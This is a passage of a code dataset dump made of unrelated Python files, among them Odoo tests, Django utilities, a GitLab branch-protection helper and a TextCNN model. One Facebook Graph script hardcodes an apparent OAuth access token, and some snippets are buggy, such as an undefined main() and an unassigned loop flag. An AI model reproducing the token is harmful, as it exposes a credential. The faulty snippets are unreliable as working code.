'location_id': self.stock_A2.id, # prio:3\n 'quantity': 5.0,\n 'in_date': today,\n })\n\n quant_3 = self.stock_quant_model.create({\n 'product_id': self.product_Z.id,\n 'location_id': self.stock_A3.id, # prio:1\n 'quantity': 10.0,\n 'in_date': today,\n })\n\n self.quants = quant_1 + quant_2 + quant_3\n\n def test_stock_reservation_by_priority_case1(self):\n quants = self.stock_quant_model._update_reserved_quantity(self.product_Z, self.stock_A, 10)\n for quant, quantity in quants:\n if quant.location_id == self.stock_A1: self.assertEqual(quant.reserved_quantity, 0.0, 'No products should be reserved in A-1 (prio:2)')\n if quant.location_id == self.stock_A2: self.assertEqual(quant.reserved_quantity, 0.0, 'No products should be reserved in A-2 (prio:3)')\n if quant.location_id == self.stock_A3: self.assertEqual(quant.reserved_quantity, 10.0, '10 products should be reserved in A-3 (prio:1)')\n\n def test_stock_reservation_by_priority_case2(self):\n quants = self.stock_quant_model._update_reserved_quantity(self.product_Z, self.stock_A, 12)\n for quant, quantity in quants:\n if quant.location_id == self.stock_A1: self.assertEqual(quant.reserved_quantity, 2.0, '2 products should be reserved in A-1 (prio:2)')\n if quant.location_id == self.stock_A2: self.assertEqual(quant.reserved_quantity, 0.0, 'No products should be reserved in A-2 (prio:3)')\n if quant.location_id == self.stock_A3: self.assertEqual(quant.reserved_quantity, 10.0, '10 products should be reserved in A-3 (prio:1)')\n\n def test_stock_reservation_by_priority_case3(self):\n quants = self.stock_quant_model._update_reserved_quantity(self.product_Z, self.stock_A, 22)\n for quant, quantity in quants:\n if quant.location_id == self.stock_A1: self.assertEqual(quant.reserved_quantity, 12.0, '12 products should be reserved in A-1 (prio:2)')\n if quant.location_id == self.stock_A2: self.assertEqual(quant.reserved_quantity, 0.0, 'No products should be reserved in A-2 (prio:3)')\n if quant.location_id == self.stock_A3: self.assertEqual(quant.reserved_quantity, 10.0, '10 products should be reserved in A-3 (prio:1)')\n","sub_path":"outgoing_routing/tests/test_stock_reservation_by_priority.py","file_name":"test_stock_reservation_by_priority.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"537569208","text":"#!/usr/bin/env python3\n# vim:set ff=unix expandtab ts=4 sw=4:\nimport unittest\nimport numpy as np\nimport sys \nfrom scipy.misc import factorial\nfrom scipy.interpolate import interp1d \nfrom sympy import sin, symbols, Matrix, latex, Symbol, exp, solve, Eq, pi, Piecewise\n\nimport bgc_md.tests.exampleSmoothReservoirModels as ESRM\nimport bgc_md.tests.exampleSmoothModelRuns as ESMR\n\nfrom testinfrastructure.InDirTest import InDirTest\nfrom bgc_md.SmoothReservoirModel import SmoothReservoirModel \nfrom bgc_md.SmoothModelRun import SmoothModelRun \n\nclass M:\n def __init__(self,func_set = {}):\n print(func_set)\n self.func_set = func_set\n\nclass TestSmoothModelRun(InDirTest):\n def test_1(self):\n d={\"a\":1}\n m = M(d)\n\n def test_2(self):\n m = M()\n \n def test_linearize_piecewise(self):\n # Atmosphere, Terrestrial Carbon and Surface layer\n C_A, C_T, C_S = symbols('C_A C_T C_S')\n \n # equilibrium contents\n A_e, T_e, S_e = symbols('A_e T_e S_e')\n \n # equilibrium fluxes\n F_0, F_1, F_2 = symbols('F_0 F_1 F_2')\n \n # nonlinear coefficients\n alpha, beta = symbols('alpha beta')\n \n # external flux from surface layer to deep ocean\n F_ex = F_0*C_S/S_e\n \n # fossil fuel inputs\n u_A = symbols('u_A')\n \n \n #########################################\n \n state_vector = Matrix([C_A, C_T, C_S])\n time_symbol = symbols('tau')\n \n input_fluxes = {0: u_A, 1: 0, 2: F_0}\n output_fluxes = {0: Piecewise((1, time_symbol < 0), (0, True)), 1: 0, 2: F_0*C_S/S_e}\n internal_fluxes = {(0,1): F_2*(C_A/A_e)**alpha, # A --> T\n (0,2): F_1*C_A/A_e, # A --> S\n (1,0): F_2*C_T/T_e, # T --> A\n (2,0): F_1*(C_S/S_e)**beta} # S --> A\n nonlinear_srm = SmoothReservoirModel(state_vector, time_symbol, input_fluxes, output_fluxes, internal_fluxes)\n \n A_eq, T_eq, S_eq = (700.0, 3000.0, 1000.0) \n par_dict = { A_e: A_eq, T_e: T_eq, S_e: S_eq, # equilibrium contents in Pg\n F_0: 45.0, F_1: 100.0, F_2: 60.0, # equilibrium fluxes in PgC/yr\n alpha: 0.2, beta: 10.0 } # nonlinear coefficients\n \n \n # fossil fuel inputs\n par_dict[u_A] = 0\n \n # initialize model run \n times = np.linspace(0, 10, 101)\n start_values = np.array([A_eq, T_eq, S_eq])\n nonlinear_smr = SmoothModelRun(nonlinear_srm, par_dict, start_values, times)\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestSmoothModelRun)\n unittest.main()\n","sub_path":"bgc_md/tests/proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"334504613","text":"from django.conf import settings\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom django.core.mail import EmailMultiAlternatives\n\n\nclass MailMaker(object):\n\n def __init__(\n self,\n jurisdiction,\n subject='PollWorker application from workelections.com',\n **kwargs\n ):\n # Make sure email is valid\n if settings.TEST_TO_EMAIL:\n self.to_email = settings.TEST_TO_EMAIL\n else:\n self.to_email = jurisdiction.email\n self.from_email = settings.DEFAULT_FROM_EMAIL\n self.subject = subject\n self.context = {\n 'jurisdiction': jurisdiction,\n }\n\n self.context.update(kwargs)\n\n self.html_template = get_template('mailman/html_template.html')\n self.text_template = get_template('mailman/text_template.txt')\n\n def send(self):\n if self.context:\n c = Context(self.context)\n\n text_content = self.text_template.render(c)\n html_content = self.html_template.render(c)\n\n msg = EmailMultiAlternatives(self.subject, text_content,\n self.from_email, [self.to_email])\n msg.content_subtype = \"html\"\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n","sub_path":"apps/mailman/mailer.py","file_name":"mailer.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"344746014","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import RequestContext, loader\nimport blog.settings\nfrom os import listdir\nfrom os.path import isfile, join, splitext\nimport random\n\n# Create your views here.\ndef index(request):\n template = loader.get_template('sleepers/index.html')\n fileHome = blog.settings.MEDIA_ROOT\n all_files = []\n batch_names = ['batch2', 'batch1']\n for batch_name in batch_names:\n all_files += get_batch(fileHome, batch_name)\n context = RequestContext(request, {\n 'files': all_files,\n })\n return HttpResponse(template.render(context))\n\n\ndef get_batch(file_home, batch_name):\n onlyfiles = []\n whole_path = file_home+batch_name\n for f in listdir(whole_path):\n if isfile(join(whole_path, f)) and splitext(f)[1] == '.jpg':\n onlyfiles.append('/media/'+batch_name+'/'+f)\n random.shuffle(onlyfiles)\n return onlyfiles","sub_path":"sleepers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"552031401","text":"import pygame,sys,random\nimport threading\nfrom time import sleep \n\npygame.init()\nscreen = pygame.display.set_mode((500,500), pygame.RESIZABLE)\npygame.display.get_caption()\nRect1 = pygame.Rect(200,200,10,10)\nRect2 = pygame.Rect(0,0,100,100)\nestado=False\nclass Mouse:\n\tdef __init__(self):\n\t\tself.estado = False\n\t\tself.Rectangulo= (0,0,0,0)\n\t\tself.a=(0,0)\n\t\n\tdef seleccion(self,screen):\n\t\t\n\t\t\n\t\tif pygame.mouse.get_pressed()[0]==1 and self.estado ==False :\n\t\t\t\tself.a = pygame.mouse.get_pos()\n\t\t\t\tprint (self.a)\n\t\t\t\tself.estado=True\n\t\tif pygame.mouse.get_pressed()[0]==0 and self.estado==True:\n\t\t\t\t\tb=pygame.mouse.get_pos()\n\t\t\t\t\tprint (b)\n\t\t\t\t\tself.estado = False\n\t\t\t\t\tif (self.a[0]b[0] and self.a[1]b[1]):\n\t\t\t\t\t\tself.Rectangulo = pygame.Rect(self.a[0],b[1],(b[0]-self.a[0]),(self.a[1]-b[1]))\n\t\t\t\t\t\t\n\t\t\t\t\tif \t(self.a[0]>b[0] and self.a[1]>b[1]):\n\t\t\t\t\t\tself.Rectangulo = pygame.Rect(b[0],b[1],(self.a[0]-b[0]),(self.a[1]-b[1]))\t\n\t\t\t\t\t\t\n\t\t\t\t\tprint (self.Rectangulo)\t\n\t\t\t\t\tpygame.draw.rect(screen,(255,255,255),self.Rectangulo)\t\n\t\t\t\t\tsleep(0.05)\n\n\n\t\t\t\t \n\t\n\n\n \n\nmain()\n","sub_path":"OrdaComposite.py","file_name":"OrdaComposite.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"492050549","text":"import facepy\nimport pickle\n\n\ndef RemoveDomain(link):\n baseDomain = \"https://graph.facebook.com/v2.6/\"\n pos = link.find(baseDomain)\n link = link[len(baseDomain):]\n return link\n\ny = pickle.load(open(\"structureOfPost.p\",\"rb\"))\n\ndataType = 'likes'\n\ndataSheath = y[dataType]\n\nData = []\n\noauth_access_token = 'EAACEdEose0cBAELyLBZC21iJp6oH86InE3famYUT4E4i497DFlXL3jEKvd2OZBFFzIiMUdfHtMU48noIUg44tz9ksbVD2fQ2ZBsBcJJNe9O0jEXKEpG5ynYeueZAOVdFgm1W8QeZClT4BnIZBiN3oE4i8BUCY0qT28P2C7Q5Wk3QZDZD'\n\ngraph = facepy.GraphAPI(oauth_access_token)\n\nwhile(True):\n Data.extend(dataSheath['data'])\n if lastPost:\n break\n link = RemoveDomain(dataSheath['paging']['next'])\n dataSheath = graph.get(link)\n if 'next' not in dataSheath['paging']:\n lastPost = True\n\npickle.dump(Data,open(\"structureOfLikesData.p\",\"wb\"))\n\n\n\n\n","sub_path":"AddingontoDataParametrized.py","file_name":"AddingontoDataParametrized.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"123242186","text":"from logging import debug\nfrom cli_ui import warning, fatal\n\nfrom gitlabform import EXIT_PROCESSING_ERROR, EXIT_INVALID_INPUT\nfrom gitlabform.gitlab import GitLab\nfrom gitlabform.gitlab.core import NotFoundException\n\n\nclass BranchProtector(object):\n old_api_keys = [\"developers_can_push\", \"developers_can_merge\"]\n new_api_keys = [\n \"push_access_level\",\n \"merge_access_level\",\n \"unprotect_access_level\",\n ]\n extra_param_keys = [\n \"allowed_to_push\",\n \"allowed_to_merge\",\n ]\n\n def __init__(self, gitlab: GitLab, strict: bool):\n self.gitlab = gitlab\n self.strict = strict\n\n def apply_branch_protection_configuration(\n self, project_and_group, configuration, branch\n ):\n try:\n requested_configuration = configuration[\"branches\"][branch]\n\n if requested_configuration.get(\"protected\"):\n self.protect_branch(project_and_group, configuration, branch)\n else:\n self.unprotect_branch(project_and_group, branch)\n\n except NotFoundException:\n message = f\"Branch '{branch}' not found when trying to set it as protected/unprotected!\"\n if self.strict:\n fatal(\n message,\n exit_code=EXIT_PROCESSING_ERROR,\n )\n else:\n warning(message)\n\n def protect_branch(self, project_and_group, configuration, branch):\n try:\n requested_configuration = configuration[\"branches\"][branch]\n\n config_type = self.get_branch_protection_config_type(\n project_and_group, requested_configuration, branch\n )\n\n if config_type == \"old\":\n\n self.protect_using_old_api(\n requested_configuration, project_and_group, branch\n )\n\n elif config_type == \"new\":\n # when congiguration contains at least one of allowed_to_push and allowed_to_merge\n if any(\n extra_key in requested_configuration\n for extra_key in self.extra_param_keys\n ):\n for extra_param_key in self.extra_param_keys:\n # check if an extra_param is in config and it contain user parameter\n if extra_param_key in requested_configuration and any(\n \"user\" in d\n for d in requested_configuration[extra_param_key]\n ):\n for extra_config in requested_configuration[\n extra_param_key\n ]:\n # loop over the array of extra param and get the user_id related to user\n if \"user\" in extra_config.keys():\n user_id = self.gitlab.get_user_to_protect_branch(\n extra_config.pop(\"user\")\n )\n extra_config[\"user_id\"] = user_id\n\n if self.configuration_update_needed(\n requested_configuration, project_and_group, branch\n ):\n self.protect_using_new_api(\n requested_configuration, project_and_group, branch\n )\n else:\n debug(\n \"Skipping set branch '%s' access levels because they're already set\"\n )\n\n if \"code_owner_approval_required\" in requested_configuration:\n\n self.set_code_owner_approval_required(\n requested_configuration, project_and_group, branch\n )\n\n except NotFoundException:\n message = f\"Branch '{branch}' not found when trying to set it as protected/unprotected!\"\n if self.strict:\n fatal(\n message,\n exit_code=EXIT_PROCESSING_ERROR,\n )\n else:\n warning(message)\n\n def unprotect_branch(self, project_and_group, branch):\n try:\n debug(\"Setting branch '%s' as unprotected\", branch)\n\n # we don't know if the old or new API was used to protect\n # so use both when unprotecting\n\n # ...except for wildcard branch names - there are not supported by the old API\n if \"*\" not in branch:\n self.gitlab.unprotect_branch(project_and_group, branch)\n\n self.gitlab.unprotect_branch_new_api(project_and_group, branch)\n\n except NotFoundException:\n message = f\"Branch '{branch}' not found when trying to set it as protected/unprotected!\"\n if self.strict:\n fatal(\n message,\n exit_code=EXIT_PROCESSING_ERROR,\n )\n else:\n warning(message)\n\n def get_branch_protection_config_type(\n self, project_and_group, requested_configuration, branch\n ):\n\n # for new API any keys needs to be defined...\n if any(key in requested_configuration for key in self.new_api_keys):\n return \"new\"\n\n # ...while for the old API - *all* of them\n if all(key in requested_configuration for key in self.old_api_keys):\n return \"old\"\n\n else:\n fatal(\n f\"Invalid configuration for protecting branches in project '{project_and_group}',\"\n f\" branch '{branch}' - missing keys.\",\n exit_code=EXIT_INVALID_INPUT,\n )\n\n def protect_using_old_api(self, requested_configuration, project_and_group, branch):\n warning(\n f\"Using keys {self.old_api_keys} for configuring protected\"\n \" branches is deprecated and will be removed in future versions of GitLabForm.\"\n f\" Please start using new keys: {self.new_api_keys}\"\n )\n debug(\"Setting branch '%s' as *protected*\", branch)\n\n # unprotect first to reset 'allowed to merge' and 'allowed to push' fields\n self.gitlab.unprotect_branch_new_api(project_and_group, branch)\n\n self.gitlab.protect_branch(\n project_and_group,\n branch,\n requested_configuration[\"developers_can_push\"],\n requested_configuration[\"developers_can_merge\"],\n )\n\n def protect_using_new_api(self, requested_configuration, project_and_group, branch):\n debug(\"Setting branch '%s' access level\", branch)\n\n # unprotect first to reset 'allowed to merge' and 'allowed to push' fields\n self.gitlab.unprotect_branch_new_api(project_and_group, branch)\n\n protect_rules = {\n key: value\n for key, value in requested_configuration.items()\n if key != \"protected\"\n }\n\n self.gitlab.branch_access_level(\n project_and_group,\n branch,\n protect_rules,\n )\n\n def set_code_owner_approval_required(\n self, requested_configuration, project_and_group, branch\n ):\n debug(\n \"Setting branch '%s' \\\"code owner approval required\\\" option\",\n branch,\n )\n self.gitlab.branch_code_owner_approval_required(\n project_and_group,\n branch,\n requested_configuration[\"code_owner_approval_required\"],\n )\n\n def configuration_update_needed(\n self, requested_configuration, project_and_group, branch\n ):\n # get current configuration of branch access level\n (\n current_push_access_levels, # push access level array only\n current_merge_access_levels, # merge access level array only\n current_push_access_user_ids, # push allowed user array\n current_merge_access_user_ids, # merge allowed user array\n current_unprotect_access_level,\n ) = self.gitlab.get_only_branch_access_levels(project_and_group, branch)\n\n requested_push_access_levels = []\n if \"push_access_level\" in requested_configuration:\n requested_push_access_levels.append(\n requested_configuration.get(\"push_access_level\")\n )\n\n requested_push_access_user_ids = []\n if \"allowed_to_push\" in requested_configuration:\n for config in requested_configuration[\"allowed_to_push\"]:\n if \"access_level\" in config:\n # complete push access level arrays with the allowed_to_push array if access_level is defined\n requested_push_access_levels.append(config[\"access_level\"])\n elif \"user_id\" in config:\n # complete push allowed user arrays with the allowed_to_push array data if user_id is defined\n requested_push_access_user_ids.append(config[\"user_id\"])\n elif \"user\" in config:\n # complete push allowed user arrays with the allowed_to_push array data if user is defined\n requested_push_access_user_ids.append(\n self.gitlab.get_user_to_protect_branch(config[\"user\"])\n )\n\n requested_push_access_levels.sort()\n requested_push_access_user_ids.sort()\n\n requested_merge_access_levels = []\n if \"requested_merge_access_levels\" in requested_configuration:\n requested_merge_access_levels.append(\n requested_configuration.get(\"requested_merge_access_levels\")\n )\n\n requested_merge_access_user_ids = []\n if \"allowed_to_merge\" in requested_configuration:\n for config in requested_configuration[\"allowed_to_merge\"]:\n if \"access_level\" in config:\n # complete merge access level arrays with the allowed_to_push array if access_level is defined\n requested_merge_access_levels.append(config[\"access_level\"])\n elif \"user_id\" in config:\n # complete merge allowed user arrays with the allowed_to_push array data if user_id is defined\n requested_merge_access_user_ids.append(config[\"user_id\"])\n elif \"user\" in config:\n # complete merge allowed user arrays with the allowed_to_push array data if user is defined\n requested_merge_access_user_ids.append(\n self.gitlab.get_user_to_protect_branch(config[\"user\"])\n )\n\n requested_merge_access_levels.sort()\n requested_merge_access_user_ids.sort()\n\n requested_unprotect_access_level = requested_configuration.get(\n \"unprotect_access_level\"\n )\n\n return (\n requested_push_access_levels,\n requested_merge_access_levels,\n requested_push_access_user_ids,\n requested_merge_access_user_ids,\n requested_unprotect_access_level,\n ) != (\n current_push_access_levels,\n current_merge_access_levels,\n current_push_access_user_ids,\n current_merge_access_user_ids,\n current_unprotect_access_level,\n )\n\n def unprotect(self, project_and_group, branch):\n debug(\"Setting branch '%s' as unprotected\", branch)\n self.gitlab.unprotect_branch_new_api(project_and_group, branch)\n","sub_path":"gitlabform/processors/util/branch_protector.py","file_name":"branch_protector.py","file_ext":"py","file_size_in_byte":11427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"509830638","text":"# https://www.jianshu.com/p/ef78cc3cad24 动态规划问题集合\n\ndef backpack( backWeight, weightList, valueList):\n \"\"\"\n 动态规划写一个函数,来帮助你获得最多价值的宝物。\n 你可以利用下面的例子来编写程序:假设你的背包可以容纳的总重量为20,你有如下5件宝物:\n item weight value \n 0 2 3 \n 1 3 4 \n 2 4 8 \n 3 5 8 \n 4 9 10\n \"\"\"\n itemSelected = []\n dp = [ [ 0 for _ in range( backWeight + 1) ] for _ in range( len(weightList) ) ] \n\n for item in range( len(weightList) ):\n for weight in range(1, backWeight + 1):\n if weight >= weightList[item]:\n dp[item][weight] = max(dp[item-1][weight], dp[item-1][weight - weightList[item]] + valueList[item])\n else:\n dp[item][weight] = dp[item-1][weight]\n \n reserveWeight = backWeight\n for item in range( len(weightList)-1, 0 , -1 ):\n if dp[item][reserveWeight] > dp[item - 1][reserveWeight]:\n itemSelected.append(item)\n reserveWeight -= weightList[item]\n \n return dp[len(weightList)-1][backWeight],itemSelected\n\n\n \n\n\ndef main():\n\n weightList = [2,3,4,5,9]\n valueList = [3,4,8,8,10]\n backWeight = 20\n print(backpack(backWeight,weightList, valueList))\n\n\nmain()","sub_path":"data_structure/recursion/Dynamic planning/backpack.py","file_name":"backpack.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"513356847","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom __init__ import _\nimport VMC_Classes\nimport VMC_Lists\nfrom Screens.Screen import Screen\nfrom enigma import eSize, ePoint\nfrom Components.ConfigList import *\nfrom Components.config import *\ntry:\n import hashlib.sha1 as sha1\nexcept:\n import sha as sha1\nimport VMC_GUIComponents\n\n\nclass Selector(Screen):\n def __init__(self, session):\n self.session = session\n path = \"/usr/lib/enigma2/python/Plugins/Extensions/VMC/skin/VMC_Screens_Selector.xml\"\n with open(path, \"r\") as f:\n self.skin = f.read()\n f.close()\n Screen.__init__(self, session)\n self['list'] = VMC_GUIComponents.Selector(isscreen=True)\n self['list'].hide()\n self['actionsMoviesBase'] = ActionMap(['MovieSelectionActions',\n 'OkCancelActions',\n 'ColorActions',\n 'InfobarActions',\n 'ShortcutActions',\n 'WizardActions',\n 'ColorActions',\n 'SetupActions',\n 'NumberActions',\n 'MenuActions',\n 'EPGSelectActions'], {\n 'ok': self.keyOK,\n 'cancel': self.cancel,\n 'left': self.keyleft,\n 'right': self.keyright\n }, -1)\n self.onLayoutFinish.append(self.startrun)\n\n def startrun(self):\n self.onLayoutFinish.remove(self.startrun)\n self.itemcount = self['list'].getitemcount()\n self.width = (self['list'].getitemcount() * 100) + 80\n self.height = 220\n print(\"WIDTH: %d\" % self.width)\n print(\"HEIGHT: %d\" % self.height)\n self.instance.resize(eSize((self['list'].getitemcount() * 100) + 80, 220))\n self.instance.move(ePoint((1920 - self.width) / 2, (1080 - self.height) / 2))\n self['list'].show()\n\n def keyleft(self):\n self['list'].pageup()\n\n def keyright(self):\n self['list'].pagedown()\n\n def keyOK(self):\n index = self['list'].getcurrentselection()\n self.close(index)\n\n\n def cancel(self):\n self.close()\n\n","sub_path":"VMC_Screens_Selector.py","file_name":"VMC_Screens_Selector.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"266795397","text":"import logging\nimport functools\nimport platform\nimport os\n\nTMP_DIR = os.path.join(\"/tmp\", \"insights-web\")\nlogger = logging.getLogger(__name__)\n\n\ndef defaults(default=None):\n \"\"\"\n Catches any exception thrown by the wrapped function and returns `default`\n instead.\n\n Parameters\n ----------\n\n default : object\n The default value to return if the wrapped function throws an exception\n \"\"\"\n def _f(func):\n @functools.wraps(func)\n def __f(self, *args, **kwargs):\n try:\n return func(self, *args, **kwargs)\n except Exception:\n return default\n return __f\n return _f\n\n\ndef keys_in(items, *args):\n \"\"\"\n Use this utility function to ensure multiple keys are in one or more\n dicts. Returns `True` if all keys are present in at least one of the\n given dicts, otherwise returns `False`.\n\n :Parameters:\n - `items`: Iterable of required keys\n - Variable number of subsequent arguments, each one being a dict to check.\n \"\"\"\n\n found = dict((key, False) for key in items)\n for d in args:\n for item in items:\n if not found[item] and item in d:\n found[item] = True\n return all(found.values())\n\n\ndef logging_level(logger, level):\n def _f(func):\n @functools.wraps(func)\n def check_log_level(*args, **kwargs):\n if logger.getEffectiveLevel() <= level:\n return func(*args, **kwargs)\n\n return check_log_level\n\n return _f\n\n\ndef make_iter(item):\n if isinstance(item, list):\n return item\n else:\n return [item]\n\n\ndef ensure_dir(path, dirname=False):\n log = logging.getLogger(__name__)\n try:\n if dirname:\n path = os.path.dirname(path)\n log.debug(\"Ensure dir '%s'\", path)\n os.makedirs(path)\n except Exception as e:\n if log.level <= logging.DEBUG:\n log.debug(\"Failed to ensure dir: %s\", e)\n return False\n return True\n\n\ndef _create_log_record(msg, date, level, machine_id):\n log_record = logging.LogRecord(\"upload_client\", logging.getLevelName(level),\n machine_id, None, msg.strip(), None, None)\n log_record.asctime = date\n return log_record\n\n\nclass objectview(object):\n def __init__(self, dict_):\n self.__dict__ = dict_\n\n\ndef parse_table(content, delim=None, max_splits=-1, strip=True):\n \"\"\"\n Parses table-like text. Assumes the first row contains column names.\n Column names cannot contain spaces. Fields cannot be blank.\n \"\"\"\n if not content:\n return []\n if strip:\n cols = [c.strip() for c in content[0].split(delim)]\n else:\n cols = content[0].split(delim)\n r = []\n for row in content[1:]:\n row = row.strip()\n if row:\n if strip:\n parsed = dict(zip(cols, [i.strip() for i in row.split(delim, max_splits)]))\n else:\n parsed = dict(zip(cols, row.split(delim, max_splits)))\n r.append(parsed)\n return r\n\n\ndef parse_keypair_lines(content, delim='|', kv_sep='='):\n \"\"\"\n Parses a set of entities, where each entity is a set of key-value pairs\n contained all on one line. Each entity is parsed into a dictionary and\n added to the list returned from this function.\n \"\"\"\n r = []\n if content:\n for row in [line for line in content if line]:\n item_dict = {}\n for item in row.split(delim):\n key, value = [i.strip(\"'\\\"\").strip() for i in item.strip().split(kv_sep)]\n item_dict[key] = value\n r.append(item_dict)\n return r\n\n\ndef rsplit(_str, seps):\n \"\"\"\n Splits _str by the first sep in seps that is found from the right side.\n Returns a tuple without the separator.\n \"\"\"\n for idx, ch in enumerate(reversed(_str)):\n if ch in seps:\n return _str[0:-idx - 1], _str[-idx:]\n\n\ndef check_path(path):\n found = os.path.exists(path)\n logger.debug(\"Checking for path [%s], found = %s.\", path, found)\n return found\n\n\ndef get_addr():\n from insights.settings import web as config\n\n return \"http://%s:%s\" % (platform.node(), config[\"port\"])\n\n\ndef get_path_for_system_id(category, system_id):\n return os.path.join(TMP_DIR, category, system_id[:2], system_id)\n\n\ndef word_wrap(line, wrap_len=72):\n if len(line) > wrap_len:\n for i, c in enumerate(reversed(line[:wrap_len])):\n if c == \" \":\n break_point = wrap_len - i\n yield line[:break_point].strip()\n for more in word_wrap(line[break_point:], wrap_len):\n yield more\n break\n else:\n yield line.strip()\n","sub_path":"insights/util/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"95436021","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n# author : Apollo2Mars@gmail.com\n# Problems : inputs and terms\n\nimport tensorflow as tf\n\n\nclass TextCNN(object):\n def __init__(self, args, tokenizer, embedding_matrix):\n self.vocab_size = len(tokenizer.word2idx) + 2\n self.seq_len = args.max_seq_len\n self.emb_dim = args.emb_dim\n self.hidden_dim = args.hidden_dim\n self.batch_size = args.batch_size\n self.filters_num = args.filters_num\n self.filters_size = args.filters_size\n self.class_num = len(str(args.label_list).split(','))\n self.learning_rate = args.learning_rate\n\n self.input_x = tf.placeholder(dtype=tf.int32, shape=[None, self.seq_len], name='input_x')\n self.input_term = tf.placeholder(dtype=tf.int32, shape=[None, self.seq_len], name='input_term')\n self.input_y = tf.placeholder(dtype=tf.float32, shape=[None, self.class_num], name='input_y')\n self.global_step = tf.placeholder(shape=(), dtype=tf.int32, name='global_step')\n self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n\n self.embedding_matrix = embedding_matrix\n self.cnn()\n\n def cnn(self):\n with tf.device('/cpu:0'):\n emb_input = tf.Variable(tf.constant(0.0, shape=[self.vocab_size, self.emb_dim]), trainable=True, name=\"embedding_input\")\n self.ph_input = tf.placeholder(tf.float32, [self.vocab_size, self.emb_dim])\n self.input_init = emb_input.assign(self.ph_input)\n inputs = tf.nn.embedding_lookup(emb_input, self.input_x)\n\n emb_term = tf.Variable(tf.constant(0.0, shape=[self.vocab_size, self.emb_dim]), trainable=True, name=\"embedding_term\")\n self.ph_term = tf.placeholder(tf.float32, [self.vocab_size, self.emb_dim])\n self.term_init = emb_term.assign(self.ph_term)\n terms = tf.nn.embedding_lookup(emb_term, self.input_term)\n\n inputs_with_terms = tf.concat([inputs, terms], -1)\n\n with tf.name_scope('conv'):\n pooled_outputs = []\n for i, filter_size in enumerate(self.filters_size):\n with tf.variable_scope(\"conv-maxpool-%s\" % filter_size, reuse=False):\n conv = tf.layers.conv1d(inputs_with_terms, self.filters_num, filter_size, name='conv1d')\n pooled = tf.reduce_max(conv, axis=[1], name='gmp')\n pooled_outputs.append(pooled)\n outputs = tf.concat(pooled_outputs, 1)\n\n with tf.name_scope(\"fully-connect\"):\n fc = tf.layers.dense(outputs, self.hidden_dim, name='fc1')\n fc = tf.nn.relu(fc)\n fc = tf.nn.dropout(fc, self.keep_prob)\n\n with tf.name_scope(\"logits\"):\n logits = tf.layers.dense(fc, self.class_num, name='fc2')\n softmax = tf.nn.softmax(logits, name=\"my_output\")\n self.outputs = tf.argmax(softmax, 1, name='predict')\n\n with tf.name_scope(\"loss\"):\n loss = tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=self.input_y)\n loss = tf.reduce_mean(loss)\n\n with tf.name_scope(\"optimizer\"):\n self.trainer = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(loss)\n tf.summary.scalar('loss', loss)\n\n\n config = tf.ConfigProto() \n config.gpu_options.allow_growth = True \n session = tf.Session(config=config)\n session.run(tf.global_variables_initializer())\n session.run(self.input_init, feed_dict={self.ph_input: self.embedding_matrix})\n session.run(self.term_init, feed_dict={self.ph_term: self.embedding_matrix})\n self.session = session\n\n","sub_path":"classification/models/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"566602572","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 25\n\n@author: Xiang Li\n\"\"\"\n\n\"\"\"You're going to write a binary search function.\nYou should use an iterative approach - meaning\nusing loops.\n\nYour function should take two inputs:\na Python list to search through, and the value\nyou're searching for.\n\nAssume the list only has distinct elements,\nmeaning there are no repeated values, and \nelements are in a strictly increasing order.\n\nReturn the index of value, or -1 if the value\ndoesn't exist in the list.\"\"\"\n\ndef binary_search(input_array, value):\n \"\"\"Your code goes here.\"\"\"\n left = 0 # left mark\n right = len(input_array) # right mark\n middle = right//2 -1\n \n while input_array[left:right]: # iterate until slice empty array\n\n middle = (right+left)//2 # get middle index\n if input_array[middle] == value:\n return middle\n elif input_array[middle] > value:\n right = middle # update right mark\n elif input_array[middle] < value:\n left = middle+1 #update left mark\n\n return -1 \n\n\n#%%\ntest_list = [1,3,9,11,15,19,29]\ntest_val1 = 25\ntest_val2 = 15\nprint(binary_search(test_list, test_val1))\nprint(binary_search(test_list, test_val2))","sub_path":"udacity_technical_interview/05_binary_search_practice.py","file_name":"05_binary_search_practice.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"614244974","text":"from node import node\r\nfrom layer import layer\r\nimport numpy as np\r\n\r\nclass network():\r\n def 